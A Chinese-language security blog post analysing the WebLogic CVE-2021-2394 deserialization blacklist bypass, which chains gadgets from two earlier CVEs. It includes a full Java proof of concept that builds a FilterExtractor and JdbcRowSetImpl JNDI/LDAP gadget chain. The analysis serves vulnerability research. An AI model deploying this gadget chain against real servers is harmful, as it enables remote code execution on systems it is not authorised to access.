记录学习过程
漏洞是cve-2020-14756和cve-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
分析如下,绕过关键点在于FilterExtractor和SerializationHelper.readAttributeAccessor这个方法
首先FilterExtractor的readExternal调用了SerializationHelper.readAttributeAccessor,attributeAccessor属性是一个AttributeAccessor类型
readAttributeAccessor方法如下
public static AttributeAccessor readAttributeAccessor(DataInput in) throws IOException {int id = ExternalizableHelper.readInt(in);if (id == 0) {InstanceVariableAttributeAccessorExtended accessor = new InstanceVariableAttributeAccessorExtended();accessor.setAttributeName((String)ExternalizableHelper.readObject(in));return accessor;} else if (id == 1) {MethodAttributeAccessor accessor = new MethodAttributeAccessor();accessor.setAttributeName((String)ExternalizableHelper.readObject(in));accessor.setGetMethodName((String)ExternalizableHelper.readObject(in));accessor.setSetMethodName((String)ExternalizableHelper.readObject(in));return accessor;} else {return null;}}
可以看到当id为1时,会创建一个MethodAttributeAccessor对象,并设置其中的值 methodname attributename啥的
在FilterExtractor中同样实现了extract方法,这跟之前昨天CVE-2020-14756最后触发的一样,都是通过treemap来触发的
方法主要的内容是
this.getMethod != null || this.isReadOnly()) && (this.setMethod != null || this.isWriteOnly())以上不为null,就调用initializeAttributes获取class中对应的方法
其实最终也是调用getDeclaredMethod,只是多封装了基层
获取完之后调上图箭头所指向的方法
执行方法了,poc如下
import com.sun.rowset.JdbcRowSetImpl;import com.tangosol.coherence.rest.util.extractor.MvelExtractor;import com.tangosol.coherence.servlet.AttributeHolder;import com.tangosol.util.SortedBag;import com.tangosol.util.aggregator.TopNAggregator;import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;import java.io.ByteArrayInputStream;import java.io.ByteArrayOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.reflect.Field;public class test2 {public static void main(String[] args) throws Exception{MethodAttributeAccessor MethodAttributeAccessor=new MethodAttributeAccessor();MethodAttributeAccessor.setGetMethodName("prepare");MethodAttributeAccessor.setSetMethodName("setPreparedStatement");MethodAttributeAccessor.setIsWriteOnly(true);MethodAttributeAccessor.setAttributeName("test");JdbcRowSetImpl jdbcRowSet=new JdbcRowSetImpl();jdbcRowSet.setDataSourceName("ldap://127.0.0.1:8888/#wlc618");FilterExtractor filterExtractor=new FilterExtractor(MethodAttributeAccessor);MvelExtractor mvel_fake=new MvelExtractor();SortedBag PartialResult=new TopNAggregator.PartialResult(mvel_fake,2);PartialResult.add(jdbcRowSet);AttributeHolder attr=new AttributeHolder();Field m_oValue=attr.getClass().getDeclaredField("m_oValue");m_oValue.setAccessible(true);m_oValue.set(attr,PartialResult);Field m_comparator_copy=PartialResult.getClass().getDeclaredField("m_comparator_copy");m_comparator_copy.setAccessible(true);m_comparator_copy.set(PartialResult,filterExtractor);Field m_comparator=PartialResult.getClass().getSuperclass().getDeclaredField("m_comparator");m_comparator.setAccessible(true);m_comparator.set(PartialResult,filterExtractor);ByteArrayOutputStream byte_out=new ByteArrayOutputStream();ObjectOutputStream obj_out=new ObjectOutputStream(byte_out);obj_out.writeObject(attr);ByteArrayInputStream byte_input=new ByteArrayInputStream(byte_out.toByteArray());ObjectInputStream obj_input=new ObjectInputStream(byte_input);obj_input.readObject();}}
//有个坑就是如果第一次add如果是add FilterExtractor,会直接触发执行,导致报错
本文始发于微信公众号(8ypass):Weblogic cve-2021-2394分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论